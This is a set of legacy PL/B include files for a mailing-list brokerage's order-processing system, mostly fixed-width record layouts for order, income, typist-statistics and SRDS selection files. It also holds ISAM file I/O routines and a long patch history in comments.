NORDFLD2 DIM 9 nordfle2 AIM KEY 2 LIST
NORDFLD3 DIM 15 nordfle2 AIM KEY 3 MLRPO
nordfld4 dim 9 nordfle2 aim key 4 broker##
nordfld5 DIM 9 .order print file secondary aim key lr
NORDFLD6 DIM 9 nordfle2 AIM KEY 5 LIST OWNER
NORDFLD7 DIM 15 nordfle2 AIM KEY 6 MAILER KEY
NORDFLD8 DIM 5 nordfle2 AIM KEY 7 CONTACT
nordfldC DIM 6 .NORDFLE4 ISAM KEY BASED ON CAMPAIGN NUMBER
NORDFLAG FORM 1
NORDFLG2 FORM 1
NORDFLG4 FORM 1
NORDPATH FORM 1
NORDLOCK FORM 1 0 & 1=FILEPI, 2=REcord lock, 3=no lock
.............................................................................
.
ORCODE DIM 1 001-001 ORDER CODE, "S"
OSTAT DIM 1 002-002 STATUS, 0,B,Q,X,p,x,l,z
OMLRNUM DIM 6 003-008 MAILER NUMBER, AIM KEY 1 UPDATED!!!!!!!!!!!!!!!!
OLRN DIM 9 009-017 LR NUMBER, KEY UPDATED!!!!!!!!!!!!!!!!
OLNUM DIM 6 018-023 LIST NUMBER, AIM KEY 2
OLON DIM 6 024-029 LIST OWNER NUMBER UPDATED!!!!!!!!!!!!!!!!
OMLRPON DIM 12 030-041 MAILER PURCHASE ORDER NUMBER
OQTY DIM 9 042-050 QUANTITY
OMLRKY DIM 12 051-062 MAILER'S KEY
OFOCODE DIM 2 063-064 FURNISHED-ON CODE, 0,1,2,3,4,5,6,7,8,OR 9
ORTNDTEC DIM 2 065-066 RETURN DATE (CENTURY)
ORTNDTEY DIM 2 067-068 RETURN DATE (YEAR)
ORTNDTEM DIM 2 069-070 RETURN DATE (MONTH)
ORTNDTED DIM 2 071-072 RETURN DATE (DAY)
OMDTEC DIM 2 073-074 MAIL DATE (CENTURY)
OMDTEY DIM 2 075-076 MAIL DATE (YEAR)
OMDTEM DIM 2 077-078 MAIL DATE (MONTH)
OMDTED DIM 2 079-080 MAIL DATE (DAY)
OTOCODE DIM 1 081-081 TEST ORDER CODE, "1"
OSOTCODE DIM 1 082-082 SELECTION ON TEST CODE, 1,2 OR 3
.Do continuation items need to be put into a separate file so that we can have numerous be order?
OCCODE DIM 1 083-083 CONTINUATION CODE, "1"
OLRNCO DIM 6 084-089 LR NUMBER OF CONTINUATION CODE
OODTECOC DIM 2 090-091 ORDER DATE OF CONTINUATION CODE (CENTURY)
OODTECOY DIM 2 093-093 ORDER DATE OF CONTINUATION CODE (YEAR)
OODTECOM DIM 2 094-095 ORDER DATE OF CONTINUATION CODE (MONTH)
OODTECOD DIM 2 096-097 ORDER DATE OF CONTINUATION CODE (DAY)
OQTYCO DIM 9 098-106 QUANTITY OF CONTINUATION ORDER, XXX,XXX,XXX
.Can we always use value from Vendor file???
OBildrct DIM 1 107-107 Placed as bill direct? y=yes n=no ' '=no
OBRKGUAR DIM 1 108-108 BROKER GUARANTY, '1' = 30 DAY, '2' =45 DAY, '3' =60 DAY, '4' = NO DATE
OELCODE DIM 1 109-109 ENTIRE LIST CODE 1=RENT/ENTIRE,2=EXCH,3=EXCHANGE/ENTIRE
OODNUM DIM 3 110-112 OFFER DeSCRIPTION NUMBER
ONETQTY DIM 9 113-121 ORDER NET QUANTITY
OCAMP DIM 6 122-127 ASSOCIATED CAMPAIGN
OCLRSTAT DIM 1 128-128 CLEARANCE STATUS 1=EXCHANGE, 2=RENT, 3=EXC/SPLIT, 4=DENIED
OCLRINIT DIM 3 129-131 INITS OF PERSON WHO CLEARED LCR
OBRKRPT DIM 1 132-132 OUTSIDE BROKER NOTIFIED OF CLEARANCE STATUS? 1=YES, B1=NO
OCLRDTEC DIM 2 133-134 CLEAR DATE (CENTURY)
OCLRDTEY DIM 2 135-136 CLEAR DATE (YEAR)
OCLRDTEM DIM 2 137-138 CLEAR DATE (MONTH)
OCLRDTED DIM 2 139-140 CLEAR DATE (DAY)
ORENT DIM 1 141-141 LCR REQUEST FOR RENT "1" = YES
OHIST DIM 1 142-142 ORDER HISTORY "l"-LCR to Live, "L"-In-House LCR to Live, "p"-Pending to Live
ORTNNUM DIM 6 143-148 RETURN-TO NUMBER UPDATED!!!!!!!!!!!!!!!!
OUQTY DIM 9 149-157 UNIVERSE QUANTITY, XXX,XXX,XXX
OSALES10 DIM 1 158-158 TENS DIGIT OF SALESMAN #.
OSALES DIM 1 159-159 ONES DIGIT OF SALESMAN CODE
OCOCODE DIM 2 160-161 CONTACT CODE, 1,2,3, OR 4
OCO2CODE DIM 2 162-163 CONTACT CODE, 1,2,3, OR 4
OODTEC DIM 2 164-165 ORDER DATE (CENTURY)
OODTEY DIM 2 166-167 ORDER DATE (YEAR)
OODTEM DIM 2 168-169 ORDER DATE (MONTH)
OODTED DIM 2 170-171 ORDER DATE (DAY)
OSCODE DIM 1 172-172 SAMPLE CODE, 1,2, OR 3
OCOMSLCT DIM 1 173-173 overlay: COMSELECT='C', lifestyle="L"
OSHP DIM 2 174-175 SHIPPED VIA CODE, 0,1,2...9.
O1DES DIM 35 176-210 LINE #1 OF LIST DESCRIPTION, DATACARD
OREUSE DIM 6 211-216 RE-USE LR #, RTN-TO # WILL BE '0'
ODOWJ DIM 3 217-219 TYPISTS INITIALS was 2
OEXQTY DIM 9 220-228 EXCHANGE QTY ON SPLIT ORDER.
GUARCODE DIM 1 229-229 NIN GUARANTY CODE, '1' = 30 DAY.
OBRKNUM DIM 6 230-235 BROKER/CONSULTANT NUMBER. UPDATED!!!!!!!!!!!!!!!!
OBRKCNT DIM 3 236-238 BROKER/CONSULTANT CONTACT NUMBER.
osamcde DIM 3 239-241 sample numbers
onetper DIM 2 242-243 net name percentage (NN = Net Name)
onetrc FORM 3.2 244-249 net name running charge
onetfm DIM 1 250-250 net flag (F)lat'volume', per (M)'net', (N)o deducts allowed by Lo.
onetmin FORM 7 251-257 net name minimum.
.Will eventually be filler
OPPM DIM 5 258-262 PRICE PER THOUSAND, XXX.XX
OXPPM DIM 5 263-267 EXCHANGE PRICE PER THOUSAND, XXX.XX
O2DES DIM 35 268-302 LINE #2 OF LIST DESCRIPTION, KEYIN
ofiller DIM 98 303-400
<file_sep>/include/LIncio.inc
..............................................................................
.
. LIncIO LIncUSION
. NIN income report FILE I/O ROUTINES
.
.
..............................................................................
.
. ENTRY POINT : LIncKEY
. REQUIRED : 'LIncFLD'
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
LIncKEY BRANCH LIncFLAG TO LInc1
CALL LIncOPEN
LInc1 trap IOMSSG GIVING ERROR if IO
FILEPI 1;LIncFILE
READ LIncFILE,LIncFLD;LIncVARS
TRAPCLR IO
RETURN
..............................................................................
.
. ENTRY POINT : LIncTST
. REQUIRED : LIncFLD
. RETURNED :
. DESCRIPTION : TEST KEY
.
LIncTST BRANCH LIncFLAG TO LInc2
CALL LIncOPEN
LInc2 Branch LincPath to Linc2a,Linc2b
Linc2a trap IOMSSG GIVING ERROR if IO
FILEPI 1;LIncFILE
READ LIncFILE,LIncFLD;STR1
TRAPCLR IO
RETURN
Linc2b trap IOMSSG GIVING ERROR if IO
FILEPI 1;LIncFILE1
READ LIncFILE1,LIncFLD1;STR1
TRAPCLR IO
RETURN
..............................................................................
.
. ENTRY POINT : LIncKS
. REQUIRED :
. DESCRIPTION : KEY SEQUENTIAL RETURN-TO FILE READ
.
LIncKS BRANCH LIncFLAG TO LInc3
CALL LIncOPEN
LInc3 trap IOMSSG GIVING ERROR if IO
FILEPI 1;LIncFILE
READKS LIncFILE;LIncVARS
TRAPCLR IO
RETURN
..............................................................................
.
. ENTRY POINT : LIncSEQ
. REQUIRED :
. RETURNED : RETURN-TO RECORD
. DESCRIPTION : SEQUENTIAL RETURN-TO FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
LIncSEQ BRANCH LIncFLAG TO LInc4
CALL LIncOPEN
LInc4 trap IOMSSG GIVING ERROR if IO
FILEPI 1;LIncFILE
READ LIncFILE,SEQ;LIncVARS
TRAPCLR IO
RETURN
..............................................................................
.
. ENTRY POINT : LIncWRT
. REQUIRED : 'LIncFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
LIncWRT Branch LIncFLAG to LInc5
CALL LIncOPEN
LInc5 TRAP IOMSSG GIVING ERROR IF IO
FILEPI 1;LIncFILE
WRITE LIncFList;LIncVARS
TRAPCLR IO
RETURN
..............................................................................
.
. ENTRY POINT : LIncUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE RETURN-TO FILE
.
LIncUPD BRANCH LIncFLAG TO LInc6
CALL LIncOPEN
LInc6 TRAP IOMSSG GIVING ERROR IF IO
FILEPI 1;LIncFILE
UPDATE LIncFList;LIncVARS
TRAPCLR IO
RETURN
..............................................................................
.
. ENTRY POINT : LIncDEL
. REQUIRED : 'LIncFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
LIncDEL BRANCH LIncFLAG TO LInc7
CALL LIncOPEN
LInc7 TRAP IOMSSG GIVING ERROR IF IO
FILEPI 1;LIncFILE
DELETE LIncFList
TRAPCLR IO
RETURN
...............................................................................
..............................................................................
.
. ENTRY POINT : LIncOPEN
. REQUIRED : 'LIncFLAG'
. RETURNED : 'LIncFLAG' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
LIncOPEN TRAP LIncGONE IF IO
.
LIncOP
OPEN LIncFLIst
TRAPCLR IO
MOVE C1 TO LIncFLAG
RETURN
..............................................................................
LIncGONE MOVE LIncNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/NTYPDD.INC
* NTYPDD/INC.
* *****************************************************************************
* NAMES IN THE NEWS MASTER TYPIST ANALISYS FILE.
* *****************************************************************************
.
. FILE: TYPOUT
. LENGTH: 83
.COMPRESS: NONE
. TYPE: ISAM
. KEY: 9 bytes date ccyymm & TYPist
...............................................................................
.RElease 2.41 Add counters for prog34, prog 9 (combined) record bumped to 110 bytes
.RElease 2.4 changed type to NtypType DLH 22 March 2010
.Release 2.0 March 2006 combine to single records types, add new counters
NTYPNAME INIT "TYPOUT "
.begin patch 2.0
.NTYPFILE IFILE KEYLEN=3,FIX=55,UNCOMP
.NTYPFILE IFILE KEYLEN=9,FIX=83,UNCOMP
NTYPFILE IFILE KEYLEN=9,FIX=110,UNCOMP
.NTYPFLD DIM 3
NTYPFLD DIM 9
.end patch 2.0
NTYPPATH FORM 1
NTYPFLAG FORM 1
.
.begin patch 2.0
.
.** RECORD TYPE 1 TOTAL **
.
.NtypTot List
.;IDNUM DIM 5 1-5 ALWAYS 99
.IDNUM DIM 9 1-9 ALWAYS 'ccyymm99 '
.STotal FORM 5 10-14 # OF NEW ORDERS
.RTotal FORM 5 15-19 # REPRINT ORDERS
.QtyTotal Form 9 20-28 Total qty
.LCSTot FORM 5 29-33 # OF NEW LCRS
.LCRTot FORM 5 34-38 # REPRINT LCRS
.INVTOT FORM 5 39-43 #NEW INVOICES
.INVRTOT FORM 5 44-48 #REPRINT INVOICES
.CORTOTAL FORM 5 49-53 #NEW CORRECTIONS
.CANTOTAL FORM 5 54-58 #NEW CANCELATIONS
.APPTOT FORM 5 59-63 #NEW APPROVALS
.ADJTOT Form 5 64-68 #of new Adjustments
.PndTot Form 5 69-73 # pending prders
.lstTot FOrm 5 74-78 # of new datacards
.LStUTot Form 5 79-83 # updated datacards
.;SCOUNT FORM 5 6-10 # OF NEW ORDERS
.;RCOUNT FORM 5 11-15 # REPRINT ORDERS
.;LCSCOUNT FORM 5 16-20 # OF NEW LCRS
.;LCRCOUNT FORM 5 21-25 # REPRINT LCRS
.;INVTOT FORM 5 26-30 #NEW INVOICES
.;INVRTOT FORM 5 31-35 #REPRINT INVOICES
.;CORTOTAL FORM 5 36-40 #NEW CORRECTIONS
.;CANTOTAL FORM 5 41-45 #NEW CANCELATIONS
.;APPTOT FORM 5 46-50 #NEW APPROVALS
.;ADJTOT Form 5 51-55 #of new Adjustments
. ListEnd
.
.** RECORD TYPE 2 DETAIL **
.
NtypDet List
TypDate Dim 6 1-6 CCYYMM
NtypTYPE DIM 3 7-9 TYPISTS INITIALS
.TYPE DIM 5 1-5 TYPISTS INITIALS
SUBCOUNT FORM 5 10-14 # NEW ORDERS
REPCOUNT FORM 5 15-19 # REPRINT ORDERS
SUBQTY FORM 9 20-28 # OF NAMES
LSUBCNT FORM 5 29-33 # NEW LCRS
LREPCNT FORM 5 34-38 # REPRINT LCRS
INVCOUNT FORM 5 39-43 # NEW INVOICES
INVRCNT FORM 5 44-48 # REPRINT INVOICES
CORCOUNT FORM 5 49-53 # NEW CORRECTIONS
CANCOUNT FORM 5 54-58 # NEW CANCELLATIONS
.APPCOUNT FORM 5 59-63 # NEW APPROVALS
PndUCount FOrm 5 59-63 #of PEnding Updates 2013 October 3
ADJCount Form 5 64-68 #of new Adjustments
PndCOunt Form 5 69-73 # of New pending
lstCount FOrm 5 74-78 # of new datacards
LStUCOunt Form 5 79-83 # updated datacards
. adds
DBCount Form 5 84-88 # new database records from prog 34 and prog 9 and 15?
DBUcount Form 5 89-93 # Updated database records from prog 34 and prog 9 and 15?
NtypFill dim 17 94-110 .fill
...
.SUBCOUNT FORM 4 6-9 # NEW ORDERS
.REPCOUNT FORM 4 10-13 # REPRINT ORDERS
.SUBQTY FORM 9 14-22 # OF NAMES
.LSUBCNT FORM 4 23-26 # NEW LCRS
.LREPCNT FORM 4 27-30 # REPRINT LCRS
.INVCOUNT FORM 4 31-34 # NEW INVOICES
.INVRCNT FORM 4 35-38 # REPRINT INVOICES
.CORCOUNT FORM 4 39-42 # NEW CORRECTIONS
.CANCOUNT FORM 4 43-46 # NEW CANCELLATIONS
.APPCOUNT FORM 4 47-50 # NEW APPROVALS
.ADJCount Form 5 51-55 #of new Adjustments
Listend
.
.end patch 2.0
<file_sep>/include/SRDSSLTdd.inc
******************************************************
* SRDSSLTDD INCLUSION
* SUBSIDIARY FILE FOR DATACARD
* ADDRESSING FILE DESCRIPTOR.
. ....................................................
* ****************************************************
* NAMES IN THE NEWS SRDS FILE.
* ****************************************************
.
. FILE: NISRDSSLT
. LENGTH: 51
. TYPE: ISAM,MANAGED
. INDEX KEY: 1-6 SRDSSLTLIST
......................................................
SRDSSLTNAME INIT "SRDS_SLT.ISI|NINS1:502"
SRDSSLTFLIST FILELIST
SRDSSLTFILE IFILE KEYLEN=6,FIXED=51,Name="SRDS_SLT.isi|NINS1:502"
FILELISTEND
.>Patch 1.1 End
.
SRDSSLTLOCK FORM 1 0 OR 1=filepi,2=recordlock, 3=no lock
SRDSSLTFLD DIM 6
SRDSSLTFLD1 DIM 9
SRDSSLTFLAG FORM 1
SRDSSLTPATH FORM 1
.
SRDSSLTVARS LIST
SRDSSLTLIST DIM 6 1-6 LIST NUMBER
SRDSSLTTYPE DIM 1 7-7 if Known record type ADDRESS/Select/Arrangement/sourse
SRDSSLTNUM DIM 3 9-10 NIN ADDRESS/Select/Arrangement/sourse CODE NUMBER
SRDSSLTPRICE FORM 5.2 11-18 SELECTION CODE PRICE
SRDSSLTDESC DIM 3 19-21 SELECTION CODE DESCRIPTION
. " " OR "000" NO DESCRIPTION/CALCULATION
. "001" /M
. "002" /FLAT
. "003" /EACH
. "004" /MIN
. "005" N/A
. "006" N/C
. "007" SEEBASE
. "008" SEEDESC
. "009" INQUIRE
SRDSSLTDES Dim 30 22-51 .description from SRDS XML FIle
LISTEND
<file_sep>/include/norddd104.inc
..............................................................................
.
. NORDDD INCLUSION
. NIN ORDER FILE DEFINITION
.
. FILE NAME : NINORD
. REC LENGTH: 408 FIXED .WAS 294
. INDEX KEY : (1) 7-12 (LR#)
. (2)303-306,7-12 broker/consultant#+lr#
.AIMDEX KEYS: (1) 3-6 (MAILER#)
. (2) 16-21 (LIST#)
. (3) 26-37 (PO#)
. (4) 303-306 (broker/consultant#)
.START PATCH 19 ADDED LOGIC
. (5) 22-25 (LIST OWNER)
. (6) 52-63 (MAILER KEY)
. (7) 198-199 (CONTACT)
.END PATCH 19 ADDED LOGIC
.............................................................................
.###################################### NOTE ordprint uses these vars and is still hardwired in nordtest.pls
.######################################
.######################################
.######################################
.######################################
.#####DLH added nordfld5 aim key by lr for ninprint - AH stuff allow delete by lr
.misc notes regarding future record format changes:
.add a second contact (nin) field (shipping contact) not a required field
.allow for larger client nane 25-> 45
.expand shipping code from 1 to 2 bytes & add in house transfer (change to file?)
.Y2 in ccyymmdd format for all dates
.allow for Pending order status and be able to track NEVER Approved.
.allow for second contact shipping Info Contact (not required)
.expand media to 2 bytes
.expand quantity fields to 9 bytes
.review other fields for expansion
........................................................................
.
. Patch 21.1 DLH 09Jan2006 Company code "P" for Pacific Lists
. Patch 21 DLH 12September2006 add OFulFIll 6 byte Fulfillment company#
. PATCH 20 DMBASH 18JUN2005 Change IP Address of File Manager
. PATCH 19 ASH 02MAY2003 ADDED NEW AAMDICES FOR NEW SHIPPING PROGRAM
. PATCH 18 ASH 19MAR01 MOVED NINORD TO FILE MANAGER
. PATCH 17 ASH 15SEP00 Added Net Quantity
. PATCH 16 ASH 11MAY00 Added new key value - associated Campaign
. PATCH 15 ASH 19APR00 Added new var - associated Campaign
. PATCH 13 ASH 29Nov99 Added new var to determine if Rental
. PATCH 12 ASH ??????? Added new var
. PATCH 11 ASH 04May99 Added Exchange Price var
. patch 10 ASH 23Dec98 file conversion with Y2K expansion
. patch 5 DLH 28Sep98 add new ostat & cancodes for Pending orders
.30Mar98 DLH add code for Multiple locking modes
.23may95 DLH change unused obrkcode to obildrct - to track direct billing
.17oct94 DLh proposed change adding net info expand record to 294.
.15jul93 dlh add sample code, expand mlr PO from 7 to 12, put sales numbers.
. together were 165 & 246 now 170-171 expand typist inits to 3.
.new record size = 278
.23APR93 DLH PREP WORK ADD BROKER/CONSULTANT FIELDS, RECORD SIZE WILL BE 269.
.21OCT92 DLH ELIMINATE OBLANK ADDED OBRKCODE, OBRKGUAR.
..............................................................................
.
NORDNAME DIM 30
.START PATCH 18 REPLACED LOGIC
.NORDNME1 INIT "NINORD"
.NORDNME2 INIT "NINORD"
.nordnme3 init "NINORDB"
..START PATCH 16 ADDED LOGIC
.nordnme4 init "NINORDC"
..END PATCH 16 ADDED LOGIC
.>START PATCH 20 CHANGED IP ADDRESS
.NORDNME1 INIT "NINORD.ISI|20.20.30.104:502"
NORDNME1 INIT "NINORD.ISI|10.10.30.104:502"
.NORDNME2 INIT "NINORD.AAM|20.20.30.104:502"
NORDNME2 INIT "NINORD.AAM|10.10.30.104:502"
nordnme3 init "NINORDB"
.nordnme4 init "NINORDC.ISI|20.20.30.104:502"
nordnme4 init "NINORDC.ISI|10.10.30.104:502"
.>END PATCH 20 CHANGED IP ADDRESS
.END PATCH 18 REPLACED LOGIC
NORDFILE IFILE KEYLEN=6,FIXED=408,NODUPLICATES
IFNZ PC
NORDFLE2 AFILE FIXED=408
XIF
IFZ PC
.NORDFLE2 AFILE 17,4,,FIXED=294 .pcbus
NORDFLE2 AFILE FIXED=408 .plb
XIF
.NORDFLE3 IFILE KEYLEN=10,FIXED=294
.START PATCH 16 ADDED LOGIC
NORDFLE4 IFILE KEYLEN=6,FIXED=408
.END PATCH 16 ADDED LOGIC
NORDFLD DIM 6
NORDFLD1 DIM 7 nordfle2 AIM KEY 1 MLR
NORDFLD2 DIM 9 nordfle2 AIM KEY 2 LIST
.NORDFLD3 DIM 11 nordfle2 AIM KEY 3 MLRPO
NORDFLD3 DIM 15 nordfle2 AIM KEY 3 MLRPO
nordfld4 dim 7 nordfle2 aim key 4 broker##
nordfld5 DIM 9 .order print file secondary aim key lr
.START PATCH 19 ADDED LOGIC
NORDFLD6 DIM 7 nordfle2 AIM KEY 5 LIST OWNER
NORDFLD7 DIM 15 nordfle2 AIM KEY 6 MAILER KEY
NORDFLD8 DIM 5 nordfle2 AIM KEY 7 CONTACT
.END PATCH 19 ADDED LOGIC
.START PATCH 16 ADDED LOGIC
nordfldC DIM 6 .NORDFLE4 ISAM KEY BASED ON CAMPAIGN NUMBER
.END PATCH 16 ADDED LOGIC
NORDFLAG FORM 1
NORDFLG2 FORM 1
.NORDFLG3 FORM 1
.START PATCH 16 ADDED LOGIC
NORDFLG4 FORM 1
.END PATCH 16 ADDED LOGIC
NORDPATH FORM 1
NORDLOCK FORM 1 0 & 1=FILEPI, 2=REcord lock, 3=no lock
.
ORCODE DIM 1 001-001 ORDER CODE, "S"
OSTAT DIM 1 002-002 STATUS, 0,B,Q,X,p,x,l,z
. 0-Live order
. B-Billed order
. Q-Cancelled/Billed order
. X-Cancelled order
. e-Live Order with Estimated Invoice uses "X" if cancelled
.patch 5 New values for OSTAT p Lower case = Pending order (awaiting LO/manager Approval)
. x Lower case = Cancellation of above (never approved)
. l Lower case = LCR
. z Lower case = Cancellation of LCR
..................................................
.WILL NEED TO BE UPDATED WHEN CLIENT FILE IS FINISHED
OMLRNUM DIM 4 003-006 MAILER NUMBER, AIM KEY 1
..................................................
OLRN DIM 6 007-012 LR NUMBER, KEY
OCOBN DIM 3 013-015 CONTACT # (NIN) OR BROKER # (CMP)
OLNUM DIM 6 016-021 LIST NUMBER, AIM KEY 2
..................................................
.WILL NEED TO BE UPDATED WHEN CLIENT FILE IS FINISHED
OLON DIM 4 022-025 LIST OWNER NUMBER
..................................................
OMLRPON DIM 12 026-037 MAILER PURCHASE ORDER NUMBER was 7
.Start Patch 10 - expand var
.OQTY DIM 7 038-044 QUANTITY, X,XXX,XXX
OQTY DIM 9 038-046 QUANTITY, X,XXX,XXX
.End Patch 10 - expand var
OPPM DIM 5 047-051 PRICE PER THOUSAND, XXX.XX
OMLRKY DIM 12 052-063 MAILER'S KEY
.Start Patch 10 - expand var
.OFOCODE DIM 1 062-062 FURNISHED-ON CODE, 0,1,2,3,4,5,6,7,8,OR 9
OFOCODE DIM 2 064-065 FURNISHED-ON CODE, 0,1,2,3,4,5,6,7,8,OR 9
.end Patch 10 - expand var
.Start Patch 10 - add var and rearrange other date fields
.ORTNDTEM DIM 2 063-064 RETURN DATE (MONTH)
.ORTNDTED DIM 2 065-066 RETURN DATE (DAY)
.ORTNDTEY DIM 2 067-068 RETURN DATE (YEAR)
.OMDTEM DIM 2 069-070 MAIL DATE (MONTH)
.OMDTED DIM 2 071-072 MAIL DATE (DAY)
.OMDTEY DIM 2 073-074 MAIL DATE (YEAR)
ORTNDTEC DIM 2 066-067 RETURN DATE (CENTURY)
ORTNDTEY DIM 2 068-069 RETURN DATE (YEAR)
ORTNDTEM DIM 2 070-071 RETURN DATE (MONTH)
ORTNDTED DIM 2 072-073 RETURN DATE (DAY)
OMDTEC DIM 2 074-075 MAIL DATE (CENTURY)
OMDTEY DIM 2 076-077 MAIL DATE (YEAR)
OMDTEM DIM 2 078-079 MAIL DATE (MONTH)
OMDTED DIM 2 080-081 MAIL DATE (DAY)
.End Patch 10 - add var and rearrange other date fields
OTOCODE DIM 1 082-082 TEST ORDER CODE, "1"
OSOTCODE DIM 1 083-083 SELECTION ON TEST CODE, 1,2 OR 3
OCCODE DIM 1 084-084 CONTINUATION CODE, "1"
OLRNCO DIM 6 085-090 LR NUMBER OF CONTINUATION CODE
.Start Patch 10 - add var and rearrange other date fields
.OODTECOM DIM 2 084-085 ORDER DATE OF CONTINUATION CODE (MONTH)
.OODTECOD DIM 2 086-087 ORDER DATE OF CONTINUATION CODE (DAY)
.OODTECOY DIM 2 088-089 ORDER DATE OF CONTINUATION CODE (YEAR)
OODTECOC DIM 2 091-092 ORDER DATE OF CONTINUATION CODE (CENTURY)
OODTECOY DIM 2 093-094 ORDER DATE OF CONTINUATION CODE (YEAR)
OODTECOM DIM 2 095-096 ORDER DATE OF CONTINUATION CODE (MONTH)
OODTECOD DIM 2 097-098 ORDER DATE OF CONTINUATION CODE (DAY)
.End Patch 10 - add var and rearrange other date fields
.Start Patch 10 - expand var
.OQTYCO DIM 6 090-095 QUANTITY OF CONTINUATION ORDER, XXX,XXX
.OSPI DIM 12 96-107 SPECIAL INSTRUCTION CODES, MAX.6 (2 DIGIT)
OQTYCO DIM 9 099-107 QUANTITY OF CONTINUATION ORDER, XXX,XXX,XXX
OSPI DIM 24 108-131 SPECIAL INSTRUCTION CODES, MAX.6 (2 DIGIT)
.End Patch 10 - expand var
OBildrct DIM 1 132-132 Placed as bill direct? y=yes n=no ' '=no
OBRKGUAR DIM 1 133-133 BROKER GUARANTY, '1' = 30 DAY.
. '2' =45 DAY, '3' =60 DAY, '4' = NO DATE
OELCODE DIM 1 134-134 ENTIRE LIST CODE
. 1=RENT/ENTIRE,2=EXCH,3=EXCHANGE/ENTIRE
OODNUM DIM 7 135-141 OFFER DeSCRIPTION NUMBER
.START PATCH #11 - REPLACED LOGIC WITH ADDED VAR
.OODES DIM 40 142-181 OFFER DESCRIPTION
.START PATCH 15 NEW VAR
.OODES DIM 20 142-161 OFFER DESCRIPTION
.START PATCH 17 NEW VAR
.OODES DIM 14 142-155 OFFER DESCRIPTION
OODES DIM 5 142-146 OFFER DESCRIPTION
ONETQTY DIM 9 147-155 ORDER NET QUANTITY
.END PATCH 17 NEW VAR
OCAMP DIM 6 156-161 ASSOCIATED CAMPAIGN
.END PATCH 15 NEW VAR
.Start Patch #14 - added var
OCLRSTAT DIM 1 162-162 CLEARANCE STATUS 1=EXCHANGE, 2=RENT, 3=EXC/SPLIT, 4=DENIED
OCLRINIT DIM 3 163-165 INITS OF PERSON WHO CLEARED LCR
OBRKRPT DIM 1 166-166 OUTSIDE BROKER NOTIFIED OF CLEARANCE STATUS? 1=YES, B1=NO
OCLRDTEC DIM 2 167-168 CLEAR DATE (CENTURY)
OCLRDTEY DIM 2 169-170 CLEAR DATE (YEAR)
OCLRDTEM DIM 2 171-172 CLEAR DATE (MONTH)
OCLRDTED DIM 2 173-174 CLEAR DATE (DAY)
.End Patch #14 - added var
.Start Patch #13 - added var
ORENT DIM 1 175-175 LCR REQUEST FOR RENT "1" = YES
.End Patch #13 - added var
.Start Patch #12 - added var
OHIST DIM 1 176-176 ORDER HISTORY "l"-LCR to Live, "L"-In-House LCR to Live, "p"-Pending to Live
. IN-HOUSE LCR's: "e"-Waiting for Clearance
. "E"-Cleared
. "*"-Faxed to Owner
. "z"-Denied
.End Patch #12 - added var
OXPPM DIM 5 177-181 EXCHANGE PRICE PER THOUSAND, XXX.XX
.END PATCH #11 - REPLACED LOGIC WITH ADDED VAR
..................................................
.WILL NEED TO BE UPDATED WHEN CLIENT FILE IS FINISHED
ORTNNUM DIM 4 182-185 RETURN-TO NUMBER
..................................................
OTAPERET DIM 1 186-186 TAPE-RETURNABLE ?
.Start Patch 10 - expand var
.OUQTY DIM 7 163-169 UNIVERSE QUANTITY, X,XXX,XXX
OUQTY DIM 9 187-195 UNIVERSE QUANTITY, XXX,XXX,XXX
.End Patch 10 - expand var
OSALES10 DIM 1 196-196 TENS DIGIT OF SALESMAN #.
OSALES DIM 1 197-197 ONES DIGIT OF SALESMAN CODE
.Start Patch 10 - expand var and add var
.OCOCODE DIM 1 172-172 CONTACT CODE, 1,2,3, OR 4
OCOCODE DIM 2 198-199 CONTACT CODE, 1,2,3, OR 4
OCO2CODE DIM 2 200-201 CONTACT CODE, 1,2,3, OR 4
.End Patch 10 - expand var and add var
.Start Patch 10 - add var and rearrange other date fields
.OODTEM DIM 2 173-174 ORDER DATE (MONTH)
.OODTED DIM 2 175-176 ORDER DATE (DAY)
.OODTEY DIM 2 177-178 ORDER DATE (YEAR)
OODTEC DIM 2 202-203 ORDER DATE (CENTURY)
OODTEY DIM 2 204-205 ORDER DATE (YEAR)
OODTEM DIM 2 206-207 ORDER DATE (MONTH)
OODTED DIM 2 208-209 ORDER DATE (DAY)
.End Patch 10 - add var and rearrange other date fields
OSCODE DIM 1 210-210 SAMPLE CODE, 1=sample enclosed,2=sample to follow, OR 3=sample prev approved
OCOMSLCT DIM 1 211-211 overlay: COMSELECT='C', lifestyle="L"
. (LSVCS)
.Start Patch 10 - expand var
.OSHP DIM 1 181-181 SHIPPED VIA CODE, 0,1,2...9.
OSHP DIM 2 212-213 SHIPPED VIA CODE, 0,1,2...9.
.End Patch 10 - expand var
O1DES DIM 35 214-248 LINE #1 OF LIST DESCRIPTION, DATACARD
O2DES DIM 35 249-283 LINE #2 OF LIST DESCRIPTION, KEYIN
OREUSE DIM 6 284-289 RE-USE LR #, RTN-TO # WILL BE '0'
ODOWJ DIM 3 290-292 TYPISTS INITIALS was 2
.Start Patch 10 - expand var
.OEXQTY DIM 7 261-267 EXCHANGE QTY ON SPLIT ORDER.
OEXQTY DIM 9 293-301 EXCHANGE QTY ON SPLIT ORDER.
.End Patch 10 - expand var
GUARCODE DIM 1 302-302 NIN GUARANTY CODE, '1' = 30 DAY.
. '2' =45 DAY, '3' =60 DAY, '4' = NO DATE
. '5' =NOT USED, '6'=REC'D PREPAY,
. '7' REC'D PRE 30-DAY, '8' REC'D PRE 60,
. '9' =REC'D PRE 60 DAY.
..................................................
.WILL NEED TO BE UPDATED WHEN CLIENT FILE IS FINISHED
OBRKNUM DIM 4 303-306 BROKER/CONSULTANT NUMBER.
OBRKCNT DIM 3 307-309 BROKER/CONSULTANT CONTACT NUMBER.
..................................................
osamcde dim 3 310-312 sample numbers
onetper dim 2 313-314 net name percentage (NN = Net Name)
onetrc form 3.2 315-320 net name running charge
onetfm dim 1 321-321 net flag (F)lat'volume', per (M)'net', (N)o
. deducts allowed by Lo.
.
onetmin form 7 322-328 net name minimum.
.begin patch 20
OFullFil Dim 6 329-334 Fullfilment number
.begin patch 21.1
